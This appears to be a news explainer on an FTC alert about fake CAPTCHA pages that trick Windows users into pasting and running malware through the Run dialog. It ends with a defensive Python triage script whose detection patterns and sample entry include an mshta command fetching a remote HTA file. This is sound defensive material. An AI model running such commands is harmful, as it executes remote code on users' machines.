The Federal Trade Commission published a consumer alert in June 2026 warning that fake CAPTCHA pop-ups are being used to trick people into running malware on their own computers. The scheme replaces the familiar “prove you’re human” verification box with a look-alike page that instructs visitors to press a specific sequence of keyboard shortcuts, quietly pasting and executing malicious code. The FTC’s advice is blunt: close the page immediately and do not follow any on-screen instructions.
How fake CAPTCHAs hijack the Windows Run dialog
The attack works by exploiting trust. Most internet users have clicked through a CAPTCHA dozens of times without thinking twice. These fake versions mimic that routine but add an unusual step. After the pop-up appears, on-screen text tells the user to press Windows+R, then Ctrl+V, then Enter. That three-keystroke sequence opens the Windows Run dialog, pastes a command already placed on the clipboard, and executes it, all in under two seconds. The FTC alert spells out these exact steps so readers can recognize the pattern before falling for it.
Behind the scenes, the malicious page uses a JavaScript clipboard function called navigator.clipboard.writeText to silently load the payload before the user presses anything. Israel’s National Cyber Directorate documented this mechanism in its research on a campaign it named ShadowCaptcha, which impersonates Cloudflare and Google CAPTCHA designs. The Israeli researchers identified two distinct execution flows: one through the Win+R Run dialog and another using .hta files processed by the Windows mshta utility. Both paths hand control of the machine to the attacker.
The clipboard write happens without a visible prompt on most default browser configurations. That gap between what the browser permits and what the user sees is the core vulnerability these campaigns exploit. Browsers that allow silent clipboard writes give attackers a free staging area for their commands. Comparing infection rates across browser versions that do and do not require explicit clipboard permission could reveal how much that single default setting contributes to the attack’s success, though no public telemetry dataset has yet tested that comparison.
FTC and Israeli researchers trace the same playbook
The FTC alert and the Israeli National Cyber Directorate research describe nearly identical mechanics from different vantage points. The FTC focuses on consumer protection, telling people what the scam looks like and what to do if they encounter it. The Israeli agency provides a technical breakdown of the JavaScript, the command payloads, and the delivery infrastructure. Together, the two documents confirm that the same tactic is active and that multiple governments consider it a serious threat.
The FTC also recommends specific recovery steps for anyone who may have already followed the fake instructions: disconnect the device from the internet and run security software right away. That guidance mirrors standard incident-response advice, but the agency’s decision to issue a standalone consumer alert signals that the volume or severity of reports reached a threshold worth public attention. The alert further encourages victims to report incidents directly to the FTC so investigators can track emerging patterns and coordinate with law enforcement.
Deceptive pop-ups are not a new concern for the commission. In October 2016, the FTC charged tech support companies with using deceptive pop-up ads to scare consumers into purchasing unneeded services. In that earlier campaign, victims were confronted with alarming full-screen warnings claiming their computers were infected, then steered to call centers staffed by bogus “technicians.” The new fake CAPTCHA scam swaps out the phone pitch for automated code execution, but the underlying strategy is the same: manufacture urgency, override skepticism, and push the user into doing the attacker’s work.
What consumers can do right now
Both the FTC and the Israeli researchers emphasize that user behavior remains a critical line of defense. Real CAPTCHAs never require opening the Windows Run dialog, copying and pasting system commands, or granting remote access. Any web page that instructs you to press Windows+R, type or paste a command, and hit Enter should be treated as hostile, even if it appears to be protecting a familiar site.
If you encounter such a prompt, the safest move is to close the browser tab or window immediately. Do not try to outsmart the page by experimenting with the commands or clicking additional buttons. If you already followed the instructions, disconnect from the internet, run a full system scan with reputable security software, and consider seeking professional help if anything suspicious is detected. For organizations, security teams can reduce exposure by tightening browser clipboard permissions, blocking known malicious domains, and educating employees about this specific social-engineering pattern.
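For security teams checking whether someone actually completed the Win+R, Ctrl+V, Enter sequence described above, the Run dialog keeps a per-user history in the registry. The following is an added example, not code from the FTC alert or the Israeli research: it parses exported values from that history (the RunMRU key) and flags entries that combine a script host such as mshta with a remote URL or an encoded argument. The heuristics, function names and sample values are assumptions constructed for illustration.

```python
import re

# Windows records Run-dialog (Win+R) history per user under this key: values
# named a, b, c ... hold commands ending in "\1"; MRUList gives recency order.
RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Triage heuristics: assumptions for this example, not rules from either advisory.
RULES = [
    ("script-host", re.compile(r"\b(mshta|powershell|pwsh|cmd|wscript|cscript)(\.exe)?\b", re.I)),
    ("remote-url", re.compile(r"https?://", re.I)),
    ("encoded-arg", re.compile(r"\s-(e|ec|enc\w*)\s", re.I)),
]

# Constructed sample of exported RunMRU values (not real incident data).
SAMPLE = {
    "MRUList": "cdab",
    "a": r"cmd\1",
    "b": r"\\fileserver\share\1",
    "c": r"mshta https://example.invalid/verify.hta\1",
    "d": r"powershell -NoProfile -File C:\Scripts\inventory.ps1\1",
}

def parse_runmru(values):
    """Return Run-dialog commands, most recent first."""
    order = values.get("MRUList", "")
    # Entries missing from MRUList are appended so nothing is silently skipped.
    names = list(order) + sorted(k for k in values if k != "MRUList" and k not in order)
    commands = []
    for name in names:
        data = values.get(name)
        if data is not None:
            commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands

def triage(values):
    """Flag commands that match at least two heuristics."""
    findings = []
    for command in parse_runmru(values):
        hits = [label for label, pattern in RULES if pattern.search(command)]
        # An interpreter name alone ("cmd") is routine use; two signals are required.
        if len(hits) >= 2:
            findings.append((command, hits))
    return findings

if __name__ == "__main__":
    for command, hits in triage(SAMPLE):
        print(f"review: {command}  [{', '.join(hits)}]")
```

On a live Windows host the same dictionary can be filled from the key with Python's winreg module; a flagged entry is a lead for the incident-response steps above, not proof of infection.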
The rise of fake CAPTCHA attacks underscores how quickly everyday interface elements can be repurposed against users. Verification boxes that once simply filtered out bots have become a convenient disguise for malware delivery. As attackers refine these tactics, staying safe will require a mix of browser-level safeguards, timely public warnings from agencies, and a healthy skepticism whenever a “security check” asks you to do something that looks more like system administration than simple verification.



